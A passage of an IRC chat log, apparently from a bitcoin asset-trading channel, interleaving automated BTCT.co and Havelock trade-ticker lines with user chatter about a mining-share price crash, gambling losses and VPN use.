0.00026611 = 1.3306 BTC [-] Jul 24 22:13:20 [HAVELOCK] [SMG] 3419 @ 0.000266 = 0.9095 BTC [-] Jul 24 22:13:41 [MPEX] [S.MPOE] 75 @ 0.00080404 = 0.0603 BTC [+] Jul 24 22:13:43 kingofsports nah, there was a huge one, prolly 5k+ Jul 24 22:13:55 oh wow Jul 24 22:14:01 during the big crash? Jul 24 22:14:21 "Burnside is currently having a conversation about blocking US investors from btct.co and litecoin global" Jul 24 22:14:40 kingofsports no, early days of s.dice Jul 24 22:14:41 o.0 Jul 24 22:14:43 why? Jul 24 22:14:47 Ah okay Jul 24 22:14:50 cause DHS probably Jul 24 22:14:55 https://bitcointalk.org/index.php?topic=130982.msg2796810#msg2796810 Jul 24 22:15:07 [BTC-TC]BASIC-MINING Jul 24 22:17:07 Getting online for awhile to enjoy the day, good luck all with your trading. Good talking to you mircea and everyone. Jul 24 22:18:35 [BTCTC] [AMC-PT] 2 @ 0.003455 = 0.0069 BTC [-] Jul 24 22:19:03 [BTCTC] [AMC-PT] 358 @ 0.003679 = 1.3171 BTC [+] Jul 24 22:19:04 [BTCTC] [ASICMINER-PT] 1 @ 4.795 BTC [+] Jul 24 22:19:09 [BTCTC] [AMC-PT] 500 @ 0.00368 = 1.84 BTC [+] Jul 24 22:21:10 [BTCTC] [COGNITIVE] 1 @ 0.689 BTC [+] Jul 24 22:21:31 [BTCTC] [ASICMINER-PT] 1 @ 4.725 BTC [-] Jul 24 22:21:31 [BTCTC] [BASIC-MINING] 2 @ 0.48 = 0.96 BTC [+] Jul 24 22:21:37 [BTCTC] [BASIC-MINING] 3 @ 0.485 = 1.455 BTC [+] Jul 24 22:21:37 [BTCTC] [ASICMINER-PT] 4 @ 4.724 = 18.896 BTC [-] Jul 24 22:21:38 [BTCTC] [BASIC-MINING] 1 @ 0.499 BTC [+] Jul 24 22:21:43 [BTCTC] [ASICMINER-PT] 1 @ 4.724 BTC [-] Jul 24 22:21:44 [BTCTC] [BASIC-MINING] 1 @ 0.5 BTC [+] Jul 24 22:21:46 [BTCTC] [ASICMINER-PT] 3 @ 4.723 = 14.169 BTC [-] Jul 24 22:21:49 [BTCTC] [BASIC-MINING] 2 @ 0.5 = 1 BTC [+] Jul 24 22:21:53 [BTCTC] [ASICMINER-PT] 2 @ 4.722 = 9.444 BTC [-] Jul 24 22:21:58 [BTCTC] [ASICMINER-PT] 1 @ 4.72 BTC [-] Jul 24 22:22:01 [BTCTC] [ASICMINER-PT] 1 @ 4.702 BTC [-] Jul 24 22:22:06 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 24 22:22:10 [BTCTC] [ASICMINER-PT] 2 @ 4.7 = 9.4 BTC [-] Jul 24 22:22:29 [BTCTC] [ASICMINER-PT] 6 @ 4.685 = 28.11 BTC [-] Jul 24 22:22:57 [BTCTC] [RSM] 40 @ 0.0155 = 0.62 BTC [-] Jul 24 22:25:33 [BTCTC] [ASICMINER-PT] 1 @ 4.79 BTC [+] Jul 24 22:26:25 [BTCTC] [TAT.ASICMINER] 5 @ 0.04555 = 0.2278 BTC [-] Jul 24 22:26:45 [BTCTC] [KENILWORTH] 100 @ 0.0018 = 0.18 BTC [-] Jul 24 22:26:51 so bugpoweder was the one who lost big last night Jul 24 22:27:31 [BTCTC] [COGNITIVE] 1 @ 0.61 BTC [-] Jul 24 22:27:34 [BTCTC] [TAT.ASICMINER] 3 @ 0.04555 = 0.1367 BTC [-] Jul 24 22:27:37 [BTCTC] [COGNITIVE] 10 @ 0.6003 = 6.003 BTC [-] Jul 24 22:27:41 [BTCTC] [BASIC-MINING] 1 @ 0.45 BTC [-] Jul 24 22:27:42 [BTCTC] [COGNITIVE] 5 @ 0.6002 = 3.001 BTC [-] Jul 24 22:27:47 [BTCTC] [COGNITIVE] 10 @ 0.6001 = 6.001 BTC [-] Jul 24 22:27:54 [BTCTC] [COGNITIVE] 1 @ 0.60001 BTC [-] Jul 24 22:28:01 [BTCTC] [COGNITIVE] 1 @ 0.59 BTC [-] Jul 24 22:28:05 [BTCTC] [COGNITIVE] 10 @ 0.57 = 5.7 BTC [-] Jul 24 22:28:09 [BTCTC] [COGNITIVE] 1 @ 0.5696 BTC [-] Jul 24 22:28:11 [BTCTC] [COGNITIVE] 1 @ 0.5696 BTC [-] Jul 24 22:28:13 [BTCTC] [COGNITIVE] 12 @ 0.5695 = 6.834 BTC [-] Jul 24 22:28:36 [BTCTC] [COGNITIVE] 5 @ 0.569 = 2.845 BTC [-] Jul 24 22:28:37 [BTCTC] [ASICMINER-PT] 1 @ 4.691 BTC [-] Jul 24 22:28:41 [BTCTC] [BASIC-MINING] 11 @ 0.415 = 4.565 BTC [-] Jul 24 22:28:43 [BTCTC] [COGNITIVE] 1 @ 0.5512 BTC [-] Jul 24 22:28:44 [BTCTC] [BASIC-MINING] 1 @ 0.41 BTC [-] Jul 24 22:28:45 [BTCTC] [COGNITIVE] 20 @ 0.551 = 11.02 BTC [-] Jul 24 22:28:50 [BTCTC] [BASIC-MINING] 1 @ 0.4002 BTC [-] Jul 24 22:28:52 [BTCTC] [COGNITIVE] 2 @ 0.55 = 1.1 BTC [-] Jul 24 22:28:54 [BTCTC] [BASIC-MINING] 25 @ 0.4001 = 10.0025 BTC [-] Jul 24 22:28:57 [BTCTC] [COGNITIVE] 20 @ 0.4151 = 8.302 BTC [-] Jul 24 22:28:59 [BTCTC] [BASIC-MINING] 15 @ 0.4001 = 6.0015 BTC [-] Jul 24 22:29:09 damn.. Jul 24 22:29:30 [BTCTC] [BTC-BOND] 11 @ 0.009999 = 0.11 BTC [+] Jul 24 22:29:39 what game? Jul 24 22:29:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.046 = 0.092 BTC [+] Jul 24 22:29:47 [BTCTC] [ASICMINER-PT] 1 @ 4.69 BTC [-] Jul 24 22:30:09 [BTCTC] [BASIC-MINING] 1 @ 0.4 BTC [-] Jul 24 22:30:11 [BTCTC] [BASIC-MINING] 2 @ 0.4 = 0.8 BTC [-] Jul 24 22:30:26 just-dice Jul 24 22:30:40 [BTCTC] [ASICMINER-PT] 2 @ 4.686 = 9.372 BTC [-] Jul 24 22:30:42 [BTCTC] [AMC-PT] 20 @ 0.003685 = 0.0737 BTC [+] Jul 24 22:30:53 [BTCTC] [ASICMINER-PT] 9 @ 4.69 = 42.21 BTC [+] Jul 24 22:30:56 oh Jul 24 22:31:00 [BTCTC] [AMC-PT] 652 @ 0.003685 = 2.4026 BTC [+] Jul 24 22:31:31 [BTCTC] [ASICMINER-PT] 1 @ 4.69 BTC [+] Jul 24 22:32:51 [BTCTC] [BASIC-MINING] 2 @ 0.366 = 0.732 BTC [-] Jul 24 22:32:52 [BTCTC] [ASICMINER-PT] 1 @ 4.71 BTC [+] Jul 24 22:32:59 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 24 22:33:03 [BTCTC] [ASICMINER-PT] 8 @ 4.686 = 37.488 BTC [-] Jul 24 22:33:10 [BTCTC] [ASICMINER-PT] 1 @ 4.683 BTC [-] Jul 24 22:33:15 [BTCTC] [ASICMINER-PT] 9 @ 4.683 = 42.147 BTC [-] Jul 24 22:33:20 [BTCTC] [AMC-PT] 10 @ 0.00367 = 0.0367 BTC [-] Jul 24 22:33:27 [BTCTC] [BASIC-MINING] 1 @ 0.36 BTC [-] Jul 24 22:33:31 [BTCTC] [BASIC-MINING] 12 @ 0.35 = 4.2 BTC [-] Jul 24 22:33:41 [BTCTC] [BASIC-MINING] 10 @ 0.34 = 3.4 BTC [-] Jul 24 22:33:42 [BTCTC] [BASIC-MINING] 1 @ 0.32 BTC [-] Jul 24 22:33:47 [BTCTC] [BASIC-MINING] 3 @ 0.31 = 0.93 BTC [-] Jul 24 22:33:53 [BTCTC] [BASIC-MINING] 1 @ 0.31 BTC [-] Jul 24 22:33:59 [BTCTC] [BASIC-MINING] 1 @ 0.217 BTC [-] Jul 24 22:34:03 [BTCTC] [AMC-PT] 495 @ 0.003669 = 1.8162 BTC [-] Jul 24 22:34:05 [BTCTC] [BASIC-MINING] 20 @ 0.217 = 4.34 BTC [-] Jul 24 22:34:10 [BTCTC] [AMC-PT] 990 @ 0.00367 = 3.6333 BTC [+] Jul 24 22:34:41 [BTCTC] [BASIC-MINING] 1 @ 0.201 BTC [-] Jul 24 22:34:47 [BTCTC] [BASIC-MINING] 1 @ 0.178 BTC [-] Jul 24 22:34:53 [BTCTC] [BASIC-MINING] 30 @ 0.153 = 4.59 BTC [-] Jul 24 22:34:56 Man Jul 24 22:34:56 [BTCTC] [BASIC-MINING] 1 @ 0.1501 BTC [-] Jul 24 22:35:03 [BTCTC] [BASIC-MINING] 2 @ 0.13 = 0.26 BTC [-] Jul 24 22:35:05 Glad I sold my basic Jul 24 22:35:08 [BTCTC] [BASIC-MINING] 2 @ 0.13 = 0.26 BTC [-] Jul 24 22:35:43 What a crash, from .63 to .13 Jul 24 22:35:57 [BTCTC] [AMC-PT] 375 @ 0.00367 = 1.3763 BTC [+] Jul 24 22:36:38 [BTCTC] [AMC-PT] 350 @ 0.00367 = 1.2845 BTC [+] Jul 24 22:36:54 [BTCTC] [BFMINES] 100 @ 0.0034 = 0.34 BTC [-] Jul 24 22:36:56 [BTCTC] [BFMINES] 10 @ 0.00333 = 0.0333 BTC [-] Jul 24 22:37:00 [BTCTC] [BFMINES] 100 @ 0.003323 = 0.3323 BTC [-] Jul 24 22:37:03 [BTCTC] [BFMINES] 133 @ 0.003316 = 0.441 BTC [-] Jul 24 22:37:08 [BTCTC] [BFMINES] 100 @ 0.00323 = 0.323 BTC [-] Jul 24 22:37:15 [BTCTC] [BFMINES] 57 @ 0.003201 = 0.1825 BTC [-] Jul 24 22:37:21 So dooglus locks people off JD when they have huge losses? How altruistic of him. Jul 24 22:37:30 [BTCTC] [COGNITIVE] 1 @ 0.415 BTC [-] Jul 24 22:38:35 [BTCTC] [AMC-PT] 480 @ 0.00367 = 1.7616 BTC [+] Jul 24 22:39:05 he does ?! Jul 24 22:39:13 [BTCTC] [RSM] 33 @ 0.015 = 0.495 BTC [-] Jul 24 22:39:18 [BTCTC] [RSM] 5 @ 0.01496 = 0.0748 BTC [-] Jul 24 22:39:22 Unless I'm misunderstanding? Jul 24 22:39:23 [BTCTC] [RSM] 286 @ 0.01495 = 4.2757 BTC [-] Jul 24 22:39:25 !ticker btctc BASIC-MINING Jul 24 22:39:33 [BTCT:BASIC-MINING] 1D: 0.13 / 0.45185 / 0.59 (702 shares, 317.2 BTC), 7D: 0.13 / 0.62462 / 0.788996 (2633 shares, 1644.6 BTC), 30D: 0.120001 / 0.46812 / 2.188982 (11583 shares, 5422.2 BTC) Jul 24 22:39:33 [BTCTC] [RSM] 44 @ 0.01477 = 0.6499 BTC [-] Jul 24 22:39:34 [BTCTC] [RSM] 32 @ 0.01451 = 0.4643 BTC [-] Jul 24 22:39:39 heh. Jul 24 22:39:50 what happened there, sudden illumination ? Jul 24 22:40:23 What's this business of Burnside blocking us customers from btct? Jul 24 22:40:41 [BTCTC] [DMS.SELLING] 206 @ 0.018 = 3.708 BTC [-] Jul 24 22:40:41 [BTCTC] [DMS.SELLING] 136 @ 0.0178 = 2.4208 BTC [-] Jul 24 22:40:42 [BTCTC] [DMS.MINING] 12 @ 0.01266 = 0.1519 BTC [-] Jul 24 22:40:46 [BTCTC] [DMS.MINING] 42 @ 0.01261 = 0.5296 BTC [-] Jul 24 22:40:51 [BTCTC] [DMS.MINING] 71 @ 0.01251 = 0.8882 BTC [-] Jul 24 22:40:55 [BTCTC] [DMS.MINING] 734 @ 0.0125 = 9.175 BTC [-] Jul 24 22:40:56 US* Jul 24 22:41:15 [HAVELOCK] [AM100] 3 @ 0.04381 = 0.1314 BTC [+] Jul 24 22:41:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [+] Jul 24 22:41:17 [HAVELOCK] [AM100] 1 @ 0.0438 BTC [-] Jul 24 22:41:19 [HAVELOCK] [AM100] 5 @ 0.04372 = 0.2186 BTC [-] Jul 24 22:41:26 [HAVELOCK] [AM100] 100 @ 0.04371108 = 4.3711 BTC [-] Jul 24 22:41:29 [HAVELOCK] [AM100] 54 @ 0.043711 = 2.3604 BTC [-] Jul 24 22:41:34 [HAVELOCK] [AM100] 125 @ 0.04371 = 5.4638 BTC [-] Jul 24 22:41:41 [HAVELOCK] [AM100] 1 @ 0.0437 BTC [-] Jul 24 22:41:45 [HAVELOCK] [AM100] 1 @ 0.04369992 BTC [-] Jul 24 22:41:50 [HAVELOCK] [AM100] 50 @ 0.04369991 = 2.185 BTC [-] Jul 24 22:42:00 [BTCTC] [CRYPTO-TRADE] 1 @ 0.191 BTC [-] Jul 24 22:42:03 [BTCTC] [TAT.ASICMINER] 20 @ 0.046 = 0.92 BTC [+] Jul 24 22:42:05 [BTCTC] [CRYPTO-TRADE] 2 @ 0.191 = 0.382 BTC [-] Jul 24 22:42:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.046 = 0.092 BTC [+] Jul 24 22:42:37 [BTCTC] [ASICMINER-PT] 1 @ 4.69 BTC [+] Jul 24 22:43:08 [BTCTC] [ASICMINER-PT] 1 @ 4.685 BTC [-] Jul 24 22:43:12 [HAVELOCK] [AM100] 15 @ 0.0436999 = 0.6555 BTC [-] Jul 24 22:43:16 [BTCTC] [ASICMINER-PT] 5 @ 4.685 = 23.425 BTC [-] Jul 24 22:43:18 [HAVELOCK] [AM100] 100 @ 0.04350001 = 4.35 BTC [-] Jul 24 22:43:23 [HAVELOCK] [AM100] 35 @ 0.0435 = 1.5225 BTC [-] Jul 24 22:43:25 [BTCTC] [B.YABMC] 5 @ 0.00299 = 0.015 BTC [-] Jul 24 22:43:27 [BTCTC] [ASICMINER-PT] 3 @ 4.685 = 14.055 BTC [-] Jul 24 22:43:29 [HAVELOCK] [AM100] 250 @ 0.0435 = 10.875 BTC [-] Jul 24 22:44:29 [BTCTC] [AMC-PT] 25 @ 0.003672 = 0.0918 BTC [+] Jul 24 22:44:32 [BTCTC] [TAT.ASICMINER] 25 @ 0.0459 = 1.1475 BTC [-] Jul 24 22:44:34 [BTCTC] [AMC-PT] 508 @ 0.003672 = 1.8654 BTC [+] Jul 24 22:44:39 [BTCTC] [TAT.ASICMINER] 42 @ 0.0459 = 1.9278 BTC [-] Jul 24 22:44:40 [BTCTC] [AMC-PT] 467 @ 0.003673 = 1.7153 BTC [+] Jul 24 22:44:50 [BTCTC] [AMC-PT] 12 @ 0.003467 = 0.0416 BTC [-] Jul 24 22:45:05 [HAVELOCK] [AM100] 1 @ 0.04345 BTC [-] Jul 24 22:45:09 [HAVELOCK] [AM100] 72 @ 0.04300112 = 3.0961 BTC [-] Jul 24 22:45:42 [BTCTC] [AMC-PT] 25 @ 0.003466 = 0.0867 BTC [-] Jul 24 22:45:50 [BTCTC] [TAT.ASICMINER] 45 @ 0.04699 = 2.1146 BTC [+] Jul 24 22:45:57 [BTCTC] [TAT.ASICMINER] 21 @ 0.04699 = 0.9868 BTC [+] Jul 24 22:46:11 [BTCTC] [DMS.MINING] 5 @ 0.0128 = 0.064 BTC [+] Jul 24 22:46:12 [BTCTC] [AMC-PT] 7 @ 0.003455 = 0.0242 BTC [-] Jul 24 22:46:17 [BTCTC] [DMS.MINING] 11 @ 0.0129 = 0.1419 BTC [+] Jul 24 22:46:25 [BTCTC] [DMS.MINING] 5 @ 0.013 = 0.065 BTC [+] Jul 24 22:46:31 [BTCTC] [AMC-PT] 45 @ 0.003427 = 0.1542 BTC [-] Jul 24 22:46:51 [BTCTC] [DMS.SELLING] 1 @ 0.01997 BTC [+] Jul 24 22:47:03 Why don't people just get off their ass and buy a year with privateinternetaccess Jul 24 22:47:12 [BTCTC] [AMC-PT] 405 @ 0.003426 = 1.3875 BTC [-] Jul 24 22:47:15 U.S. based vpn Jul 24 22:47:31 [BTCTC] [BITVPS] 1 @ 0.00196 BTC [-] Jul 24 22:47:31 what is honeypot? Jul 24 22:47:36 alex Jul 24 22:47:59 [BTCTC] [TAT.ASICMINER] 33 @ 0.0459 = 1.5147 BTC [-] Jul 24 22:48:01 [BTCTC] [TAT.ASICMINER] 35 @ 0.0459 = 1.6065 BTC [-] Jul 24 22:48:03 [BTCTC] [AMC-PT] 473 @ 0.003425 = 1.62 BTC [-] Jul 24 22:48:05 [BTCTC] [TAT.ASICMINER] 30 @ 0.0459 = 1.377 BTC [-] Jul 24 22:48:07 [BTCTC] [TAT.ASICMINER] 49 @ 0.0459 = 2.2491 BTC [-] Jul 24 22:48:27 hollywoodundead what's that ? Jul 24 22:49:09 if people do not want to be in the us, why don't they just take the simple step to be Jul 24 22:49:26 [BTCTC] [AMC-PT] 200 @ 0.003425 = 0.685 BTC [-] Jul 24 22:49:37 on the internet outside the us Jul 24 22:50:02 [BTCTC] [ASICMINER-PT] 1 @ 4.684 BTC [-] Jul 24 22:50:14 that's an interesting question. Jul 24 22:50:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.0456 BTC [-] Jul 24 22:50:42 [BTCTC] [TAT.MINIGAME] 30 @ 0.00027 = 0.0081 BTC [+] Jul 24 22:50:42 [BTCTC] [ASICMINER-PT] 9 @ 4.683 = 42.147 BTC [-] Jul 24 22:51:09 [BTCTC] [BTC-BOND] 24 @ 0.009921 = 0.2381 BTC [-] Jul 24 22:51:09 [BTCTC] [BFMINES] 35 @ 0.003201 = 0.112 BTC [-] Jul 24 22:51:14 the problem with us based vpns is us regulation and likely forced cooperation with us copyright trolls Jul 24 22:51:48 [BTCTC] [TAT.ASICMINER] 12 @ 0.04555 = 0.5466 BTC [-] Jul 24 22:51:54 people who care enough to use a vpn likely want a vpn that will tell officials to go jump off a cliff Jul 24 22:51:55 [BTCTC] [TAT.ASICMINER] 4 @ 0.04555 = 0.1822 BTC [-] Jul 24 22:51:59 [BTCTC] [COGNITIVE] 1 @ 0.5 BTC [+] Jul 24 22:52:06 [BTCTC] [ASICMINER-PT] 1 @ 4.681 BTC [-] Jul 24 22:52:09 [BTCTC] [BTC-BOND] 10 @ 0.009999 = 0.1 BTC [+] Jul 24 22:52:17 [BTCTC] [COGNITIVE] 1 @ 0.5 BTC [+] Jul 24 22:52:25 [BTCTC] [TAT.ASICMINER] 30 @ 0.04553 = 1.3659 BTC [-] Jul 24 22:52:53 [BTCTC] [TAT.ASICMINER] 13 @ 0.04553 = 0.5919 BTC [-] Jul 24 22:52:56 [HAVELOCK] [AM100] 75 @ 0.04300111 = 3.2251 BTC [-] Jul 24 22:52:57 they do not collect your name, address - you pay in bitcoin - this is a simple solution that only takes minutes and not much mental power to implement Jul 24 22:52:58 [HAVELOCK] [AM100] 1 @ 0.043001 BTC [-] Jul 24 22:53:00 [HAVELOCK] [AM100] 4 @ 0.043 = 0.172 BTC [-] Jul 24 22:53:02 [HAVELOCK] [AM100] 20 @ 0.043 = 0.86 BTC [-] Jul 24 22:53:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.04553 = 0.0911 BTC [-] Jul 24 22:53:33 [BTCTC] [TAT.ASICMINER] 30 @ 0.04553 = 1.3659 BTC [-] Jul 24 22:53:40 [BTCTC] [TAT.ASICMINER] 46 @ 0.04552 = 2.0939 BTC [-] Jul 24 22:53:41 [BTCTC] [ASICMINER-PT] 1 @ 4.672 BTC [-] Jul 24 22:53:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.0455 = 0.091 BTC [-] Jul 24 22:53:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.04534 = 0.2267 BTC [-] Jul 24 22:53:55 [BTCTC] [TAT.ASICMINER] 174 @ 0.04533 = 7.8874 BTC [-] Jul 24 22:53:59 [BTCTC] [TAT.ASICMINER] 100 @ 0.04527 = 4.527 BTC [-] Jul 24 22:54:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.04527 = 0.1358 BTC [-] Jul 24 22:54:04 [BTCTC] [TAT.ASICMINER] 31 @ 0.04525 = 1.4028 BTC [-] Jul 24 22:54:08 [BTCTC] [TAT.ASICMINER] 3 @ 0.0452 = 0.1356 BTC [-] Jul 24 22:54:12 [BTCTC] [TAT.ASICMINER] 97 @ 0.04503 = 4.3679 BTC [-] Jul 24 22:54:18 I guess if people want to be victims they will be, very simple steps to not be a victim Jul 24 22:54:25 i thought by U.S. law they would have to, or at least be made to at any random point in the future, and have no choice but to comply or get shut down Jul 24 22:54:28 [BTCTC] [TAT.ASICMINER] 6 @ 0.04502 = 0.2701 BTC [-] Jul 24 22:54:30 [BTCTC] [ASICMINER-PT] 1 @ 4.6701 BTC [-] Jul 24 22:54:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.04501 = 0.2251 BTC [-] Jul 24 22:54:35 [BTCTC] [ASICMINER-PT] 1 @ 4.67 BTC [-] Jul 24 22:54:37 [BTCTC] [TAT.ASICMINER] 9 @ 0.045002 = 0.405 BTC [-] Jul 24 22:54:40 [BTCTC] [ASICMINER-PT] 4 @ 4.67 = 18.68 BTC [-] Jul 24 22:54:44 [BTCTC] [TAT.ASICMINER] 15 @ 0.045 = 0.675 BTC [-] Jul 24 22:54:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [-] Jul 24 22:54:51 [BTCTC] [TAT.ASICMINER] 8 @ 0.045 = 0.36 BTC [-] Jul 24 22:54:56 [BTCTC] [TAT.ASICMINER] 4 @ 0.045 = 0.18 BTC [-] Jul 24 22:54:59 [BTCTC] [TAT.ASICMINER] 30 @ 0.0445 = 1.335 BTC [-] Jul 24 22:55:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.0441 BTC [-] Jul 24 22:55:08 [BTCTC] [TAT.ASICMINER] 3 @ 0.0441 = 0.1323 BTC [-] Jul 24 22:55:09 [BTCTC] [TAT.ASICMINER] 30 @ 0.044 = 1.32 BTC [-] Jul 24 22:55:10 [BTCTC] [TAT.MINIGAME] 14 @ 0.00027 = 0.0038 BTC [+] Jul 24 22:55:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.043902 BTC [-] Jul 24 22:55:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.043902 = 0.1317 BTC [-] Jul 24 22:55:26 [BTCTC] [TAT.ASICMINER] 35 @ 0.0435 = 1.5225 BTC [-] Jul 24 22:55:51 [BTCTC] [BFMINES] 46 @ 0.003201 = 0.1472 BTC [-] Jul 24 22:56:15 [BTCTC] [ASICMINER-PT] 1 @ 4.66 BTC [-] Jul 24 22:56:18 I do not think they are us based Jul 24 22:57:29 fuck me look at that http://coinflow.co/chart/COGNITIVE Jul 24 22:57:38 [BTCTC] [ASICMINER-PT] 5 @ 4.651 = 23.255 BTC [-] Jul 24 22:57:50 http://coinflow.co/chart/BASIC-MINING Jul 24 22:57:55 BASIC-MINING on Coinflow Jul 24 22:57:57 [BTCTC] [ASICMINER-PT] 2 @ 4.651 = 9.302 BTC [-] Jul 24 22:58:24 ahh, panic is the best time to make money Jul 24 22:58:26 [BTCTC] [ASICMINER-PT] 2 @ 4.65001 = 9.3 BTC [-] Jul 24 22:58:44 might be justified panic though Jul 24 22:58:58 COG was a known pump and dump Jul 24 22:59:05 [BTCTC] [TAT.MINIGAME] 60 @ 0.00027 = 0.0162 BTC [+] Jul 24 22:59:20 not really , if you are smart enough to be on the internet - you should be smart enough to be anywhere you want Jul 24 22:59:22 Yeah I'm trying to hold off on buying Jul 24 22:59:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.0436 = 0.1308 BTC [+] Jul 24 22:59:23 both were aren't the greatest assets to invest regardless Jul 24 22:59:24 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [-] Jul 24 22:59:38 [BTCTC] [AMC-PT] 827 @ 0.003425 = 2.8325 BTC [-] Jul 24 22:59:49 sorry bitcoin-assets not internet Jul 24 22:59:55 they weren't in my folio, still sad though Jul 24 22:59:59 [HAVELOCK] [SMG] 1581 @ 0.000266 = 0.4205 BTC [-] Jul 24 23:00:01 [HAVELOCK] [SMG] 750 @ 0.000266 = 0.1995 BTC [-] Jul 24 23:00:04 [HAVELOCK] [SMG] 11 @ 0.0002631 = 0.0029 BTC [-] Jul 24 23:00:06 [HAVELOCK] [SMG] 1500 @ 0.000263 = 0.3945 BTC [-] Jul 24 23:00:08 [HAVELOCK] [SMG] 5000 @ 0.000262 = 1.31 BTC [-] Jul 24 23:00:10 [HAVELOCK] [SMG] 2686 @ 0.0002601 = 0.6986 BTC [-] Jul 24 23:00:12 [HAVELOCK] [SMG] 1000 @ 0.00026 = 0.26 BTC [-] Jul 24 23:00:14 [HAVELOCK] [SMG] 172 @ 0.00026 = 0.0447 BTC [-] Jul 24 23:00:17 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Jul 24 23:00:18 [BTCTC] [TAT.ASICMINER] 7 @ 0.0437 = 0.3059 BTC [+] Jul 24 23:00:19 [BTCTC] [ASICMINER-PT] 1 @ 4.631 BTC [-] Jul 24 23:00:41 [HAVELOCK] [AM100] [PAID] 57.17931232 BTC to 250`172 shares, 22856 satoshi per share Jul 24 23:00:41 [BTCTC] [TAT.ASICMINER] 13 @ 0.0436 = 0.5668 BTC [-] Jul 24 23:00:41 [BTCTC] [ASICMINER-PT] 1 @ 4.612 BTC [-] Jul 24 23:00:41 [BTCTC] [AMC-PT] 7 @ 0.003425 = 0.024 BTC [-] Jul 24 23:00:49 [BTCTC] [BASIC-MINING] 23 @ 0.35 = 8.05 BTC [+] Jul 24 23:00:49 [BTCTC] [ASICMINER-PT] 6 @ 4.601 = 27.606 BTC [-] Jul 24 23:00:49 [BTCTC] [BASIC-MINING] 3 @ 0.35 = 1.05 BTC [+] Jul 24 23:00:49 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Jul 24 23:00:51 [BTCTC] [ASICMINER-PT] 4 @ 4.601 = 18.404 BTC [-] Jul 24 23:00:57 [BTCTC] [ASICMINER-PT] 10 @ 4.601 = 46.01 BTC [-] Jul 24 23:01:04 [BTCTC] [AMC-PT] 300 @ 0.003307 = 0.9921 BTC [-] Jul 24 23:01:29 [BTCTC] [AMC-PT] 50 @ 0.003305 = 0.1653 BTC [-] Jul 24 23:01:30 [BTCTC] [AMC-PT] 1565 @ 0.003305 = 5.1723 BTC [-] Jul 24 23:02:08 [BTCTC] [AMC-PT] 25 @ 0.003305 = 0.0826 BTC [-] Jul 24 23:02:11 [HAVELOCK] [AM1] [PAID] 13.49710461 BTC to 561 shares, 2405901 satoshi per share Jul 24 23:02:27 [HAVELOCK] [AM100] 1 @ 0.0442 BTC [+] Jul 24 23:02:30 [BTCTC] [AMC-PT] 52 @ 0.003307 = 0.172 BTC [+] Jul 24 23:02:34 [BTCTC] [AMC-PT] 923 @ 0.003307 = 3.0524 BTC [+] Jul 24 23:02:36 [BTCTC] [AMC-PT] 138 @ 0.003304 = 0.456 BTC [-] Jul 24 23:02:37 [BTCTC] [AMC-PT] 67 @ 0.003303 = 0.2213 BTC [-] Jul 24 23:02:39 [BTCTC] [AMC-PT] 100 @ 0.0033 = 0.33 BTC [-] Jul 24 23:02:45 [BTCTC] [AMC-PT] 50 @ 0.003292 = 0.1646 BTC [-] Jul 24 23:02:46 [BTCTC] [ASICMINER-PT] 1 @ 4.60011 BTC [-] Jul 24 23:02:48 [HAVELOCK] [SDSTM] 55 @ 0.01 = 0.55 BTC [+] Jul 24 23:02:50 [BTCTC] [AMC-PT] 800 @ 0.003284 = 2.6272 BTC [-] Jul 24 23:02:52 [BTCTC] [AMC-PT] 1000 @ 0.003282 = 3.282 BTC [-] Jul 24 23:02:53 [BTCTC] [AMC-PT] 30 @ 0.003261 = 0.0978 BTC [-] Jul 24 23:02:55 [BTCTC] [AMC-PT] 423 @ 0.00325 = 1.3748 BTC [-] Jul 24 23:02:56 [BTCTC] [ASICMINER-PT] 3 @ 4.601 = 13.803 BTC [+] Jul 24 23:03:00 [HAVELOCK] [SDSTM] 20 @ 0.01079999 = 0.216 BTC [+] Jul 24 23:03:06 [HAVELOCK] [SDSTM] 3 @ 0.01084 = 0.0325 BTC [+] Jul 24 23:03:18 [HAVELOCK] [SDSTM] 8 @ 0.01085 = 0.0868 BTC [+] Jul 24 23:03:29 [BTCTC] [ASICMINER-PT] 8 @ 4.600001 = 36.8 BTC [-] Jul 24 23:03:33 [BTCTC] [ASICMINER-PT] 11 @ 4.601 = 50.611 BTC [+] Jul 24 23:03:35 [BTCTC] [AMC-PT] 292 @ 0.003399 = 0.9925 BTC [+] Jul 24 23:03:37 [BTCTC] [ASICMINER-PT] 2 @ 4.601 = 9.202 BTC [+] Jul 24 23:03:39 [HAVELOCK] [AM100] 4 @ 0.0442 = 0.1768 BTC [+] Jul 24 23:03:52 [BTCTC] [AMC-PT] 57 @ 0.003305 = 0.1884 BTC [-] Jul 24 23:03:55 [BTCTC] [ASICMINER-PT] 3 @ 4.601 = 13.803 BTC [+] Jul 24 23:03:57 [BTCTC] [ASICMINER-PT] 2 @ 4.600001 = 9.2 BTC [-] Jul 24 23:04:23 [BTCTC] [MININGCO.ETF] 1 @ 1.888 BTC [-] Jul 24 23:04:28 [HAVELOCK] [AM100] 3 @ 0.04425 = 0.1328 BTC [+] Jul 24 23:04:52 [BTCTC] [ASICMINER-PT] 1 @ 4.601 BTC [+] Jul 24 23:04:57 [HAVELOCK] [AM100] 1 @ 0.04425 BTC [+] Jul 24 23:05:22 If you would bought at .13 you alrdy would of made 3x back Jul 24 23:05:24 Sad Jul 24 23:05:36 [BTCTC] [AMC-PT] 2 @ 0.003399 = 0.0068 BTC [+] Jul 24 23:06:31 Facebook just reported decent earnings, up 11% Jul 24 23:06:49 [HAVELOCK] [AM100] 5 @ 0.04425 = 0.2213 BTC [+] Jul 24 23:06:51 [HAVELOCK] [AM100] 2 @ 0.04425 